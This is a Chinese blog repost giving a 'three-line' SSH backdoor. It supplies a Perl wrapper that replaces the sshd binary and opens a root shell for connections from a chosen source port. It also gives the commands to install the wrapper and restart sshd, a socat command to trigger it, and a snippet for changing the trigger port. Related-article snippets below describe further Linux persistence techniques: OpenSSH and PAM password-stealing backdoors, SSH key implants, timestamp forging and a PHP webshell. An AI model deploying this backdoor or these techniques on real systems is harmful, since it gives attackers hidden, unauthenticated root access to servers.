三行代码的SSH后门

最新推荐文章于 2024-05-07 08:31:17 发布
最新推荐文章于 2024-05-07 08:31:17 发布
阅读量238 收藏
点赞数
文章标签: 运维 python 网络
原文链接:https://my.oschina.net/attacker/blog/3047121
版权

2019独角兽企业重金招聘Python工程师标准>>> hot3.png

环境

  • centos7

影响范围:OpenSSH 3.9 以后的版本都有这样的特性

被控端设置

安装环境

rpm -qa perl ||yum install perl -y
# 查看是否安装perl环境

源码

#!/usr/bin/perl
exec"/bin/sh"if(getpeername(STDIN)=~/^..zf/);
exec{"/usr/bin/sshd"}"/usr/sbin/sshd",@ARGV;

替换操作

mv /usr/sbin/sshd /usr/bin/sshd
# 移动默认sshd文件到其他位置

mv sshd /usr/sbin/sshd && chmod +x /usr/sbin/sshd
# 将修改的脚本放入sshd原有的位置

systemctl restart sshd
# 重启服务

控制端测试

yum install socat -y
# 安装socat工具

socat STDIO TCP4:10.0.1.125:22,sourceport=31334
# 连接目标主机

修改后们端口

python2

import struct
bigendian = struct.pack('>I',31333)
print repr(bigendian)

在perl正则匹配中将/^..zf/替换为ze

转载于:https://my.oschina.net/attacker/blog/3047121

weixin_33694172
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ssh后门介绍与防御
有勇气的牛排博客
08-04 1501
文章目录1 介绍2 实战演练2.1 查看版本2.2 下载SSH配置文件2.3 安装2.4 修改后门密码and文件记录2.5 编译安装2.6 摸出痕迹3 防御ssh后门 1 介绍 当拿到root权限后,一般需要维持权限(留后门),可以做openssh后门,也就是root双密码,管理员一个密码,我们的后门一个密码。 2 实战演练 实验环境:Centos7 2.1 查看版本 ssh -v 可以对ssh备份配置文件,可以对后期的文件时间进行修改 cp -p /etc/ssh/ssh_config / etc/
Linux权限维持—OpenSSH&PAM后门&SSH软连接&公私钥登录
剁椒鱼头没剁椒的博客
08-22 2490
由于密码日志文件是被隐藏的,所以可以直接使用cat去查看,这里只要管理者使用ssh进行连接就会记录密码,而这些操作都是无感的,当然若管理员会去定期排查,那么该被发现还是会被发现的,这些都是基于管理员不会定期去排查才能够持久。这里要注意一个问题就是,不一定编译就能够成功,有时候根本无法编辑,从网上找的很多资料中,都跳过直接给命令,所以这里我就提前说一下,不一定能够编译成功,不成功再次重新测试,若还是不行,就拉到吧。这里重启也可能存在问题,这个实验有时候很莫名其妙的,有时候能够测试成功,有时候测试是不成功的。
Linux常见后门(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
Libra1313的博客
05-07 2138
Rootkit 是网络犯罪分子用来控制目标计算机或网络的软件。Rootkit 有时可以显示为单个软件,但通常由一系列工具组成,这些工具允许黑客对目标设备进行管理员级控制。黑客通过多种方式在目标计算机上安装 Rootkit:最常见的是通过网络钓鱼或其他类型的社会工程攻击。受害者在不知不觉中下载并安装隐藏在计算机上运行的其他进程中的恶意软件,并让黑客控制操作系统的几乎所有方面。另一种方法是利用漏洞(即软件或未更新的操作系统中的弱点)并将 Rootkit 强制安装到计算机上。
操作系统权限维持(八)之Linux系统-SSHKey后门
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
03-27 759
当我们具有写入权限的时候,我们同样可以自行生成密钥,当kali机器第一次生成密钥的时候,并且把公钥放在了你的服务器上面,当你把公钥放在服务器上面的时候,这就意味着他可以正常的解密和加密你发过来的内容,后面你就是通过加解密去认证会话的,并不需要输入密码。将 id_rsa.pub文件中的内容拷贝到目标机器上并且写入到 authorized_keys这个文件夹下。现在我们不需要密码就能连接目标机器了。
【安全狗】Linux后渗透常见后门驻留方式分析
bocco的博客
11-02 596
当RedTeam拿下了一台服务器并获取到系统较高权限,但不知道服务器的凭证时,RedTeam会采用怎样的技术获取系统凭证呢?又或者,在RedTeam拿下一台服务器,为达到长久控制的目的而专门定制持久化后门(免杀肯定是必须的)的前提下,他们会如何结合系统自身的某些特性,达到持久化控制的效果?
linux 简单ssh后门,Linux OpenSSH后门的添加与防范
weixin_29276847的博客
05-12 496
03 还原新配置文件为旧配置文件的时间执行以下命令,使ssh_config和sshd_config文件的修改时间与ssh_config.old和sshd_config.old文件一致。touch -r /etc/ssh/ssh_config.old /etc/ssh/ssh_configtouch -r /etc/ssh/sshd_config.old /etc/ssh/sshd_config...
ssh 实例代码
12-01
struts2+hibernate+spring 代码下载struts2+hibernate+spring 代码下载struts2+hibernate+spring 代码下载struts2+hibernate+spring 代码下载
ssh整合代码
12-18
在IT领域,"SSH整合代码"通常指的是在Java Web应用中集成Spring、Struts和Hibernate这三个开源框架的过程。Spring提供了依赖注入和AOP(面向切面编程),Struts处理MVC(模型-视图-控制器)架构,而Hibernate则负责...
图片交易网站 源代码 ssh
12-08
SSH是一个流行的Java Web开发框架组合,包括Spring、Struts和Hibernate三个开源项目,它们分别负责应用的依赖注入、表现层逻辑和数据持久化。 【Spring框架】是核心容器,提供了依赖注入(Dependency Injection, DI...
ssh框架整合代码样例
07-09
这个资源包提供了一个SSH框架整合的代码样例,适用于初学者快速掌握这三个框架的协同工作方式。 Spring框架是核心,它负责管理应用程序的bean,提供了依赖注入(DI)和面向切面编程(AOP)的能力。在`spring_day04...
SSH代码生成器
05-23
SSH代码生成器是一种工具,主要用于自动化生成基于SSH(Spring、Struts2和Hibernate)框架的Web应用程序的基础代码SSH框架是Java开发中的一个经典组合,它极大地提高了开发效率,简化了项目的构建过程。SSH框架的...
Linux OpenSSH后门的添加与防范
博文视点(北京)官方博客
02-09 1473
引言:相对于Windows,Linux操作系统的密码较难获取。不过很多Linux服务器配置了OpenSSH服务,在获取root权限的情况下,可以通过修改或者更新OpenSSH代码等方法,截取并保存其SSH登录账号和密码,甚至可以留下一个隐形的后门,达到长期控制Linux服务器的目的。 很多入侵者在攻破一个Linux系统后,都会在系统中留下后门,用OpenSSH后门是入侵者的惯用方式之...
ssh后门试用
weixin_30385925的博客
04-23 314
在获取linux的root权限之后,虽然可以ssh连进去,但是可否长期进行控制呢?这里就涉及到ssh后门的问题了。在这里,我大致试用了一下一个比较老但是稳定的ssh后门,算是作个记录。后续我会翻译一篇老外用python写的ssh后门。好了,我会在虚拟机中对ssh后门做一个演示,最后我会放出下载到的后门程序。 在这里,我使用安装的Kali1.1.0_32来进行试验。...
SSH后门安装
MX的博客
04-28 1557
SSH后门安装 一:前言 通过WinSCP与Linux服务器进行连接,然后配置安装SSH后门,这次实验主要目的通过实践学习熟悉Linux SSH后门的安装过程和步骤。 二:配置SSH后门 2.1:建立连接 利用winSCP工具(也可以选用其他工具)连接已知(即已经渗透成功的服务器)服务器,如图: 连接成功后: 用SecureCRT连接成功后如图: 通过ssh -V查看当前SSH版本 上传带有...
LINUX留后门--教程(四)—— ssh 公钥免密
W小哥
06-29 2151
一、本教程作用 1、用在攻击的途径上 2、应急响应过程中,黑客会留后门,如果你连这种留后门方法都不会,怎么去应急? 不知攻,焉知防 二、SSH后门-教程 前提条件: 假设在攻击的过程中通过利用各种getshell,已经拿到目标服务器root权限 环境: 靶机(kali):192.168.160.130 攻击机(centos8):192.168.160.131 ...
SSH PAM后门(万能密码、记录密码)
网络安全。
08-19 3400
PAM是Linux默认的ssh认证登录机制,我们可以通过修改源码来实现万能密码,记录登陆密码等功能。 1、在centos中需要关闭selinux。 永久关闭需要修改/etc/selinux/config,将其中SELINUX设置为disabled。 2、查看PAM版本。 rpm -qa|grep pam 源码下载地址:http://www.linux-pam.org/library/ 3、解压。 wget http://www.linux-pam.org/library/Linux-PAM-1.1.8
linux 简单ssh后门,Linux 安全之SSH后门
weixin_27310417的博客
05-12 280
一.查看SSH版本[root@redkey vmshare]# ssh -VOpenSSH_5.3p1, OpenSSL 1.0.0-fips 29 Mar 2010二.下载SSH 源码包源码包:http://openbsd.org.ar/pub/OpenBSD/OpenSSH/portable/openssh-5.9p1.tar.gz后门文件:http://core.ipsecs.com/roo...
一猥琐的PHP后门分析
橙虚缘空间
04-18 1129
Webshell代码如下:<?php error_reporting(0); session_start(); header("Content-type:text/html;charset=utf-8");if(empty($_SESSION['api'])) $_SESSION['api']=substr(file_get_contents(sprintf('%s?%s',pack("H*...
linux服务器ssh忘记root密码,linux: OpenSSH后门获取root密码及防范
weixin_39670441的博客
04-29 1938
相对于Windows操作系统,Linux操作系统的密码较难获取。而很多Linux服务器都配置了Openssh服务,在获取root权限的情况下,可以通过修改或者更新OpenSSH代码等方法,截取并保存其SSH登录账号密码,甚至可以留一个隐形的后门,达到长期控制linux服务器的目的。在很多Linux系统被入侵后都会在系统中留后门,使用OpenSSH后门是入侵者的惯用方式之一,OpenSSh后门比较...
git上传代码 ssh
08-24
当使用git上传代码时,可以选择使用SSH协议进行上传。要使用SSH协议上传代码,首先需要在gitee的个人设置中添加和配置SSH公钥。在gitee的个人主页中,可以找到个人设置,并在其中的SSH公钥设置和查看页面中添加或...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值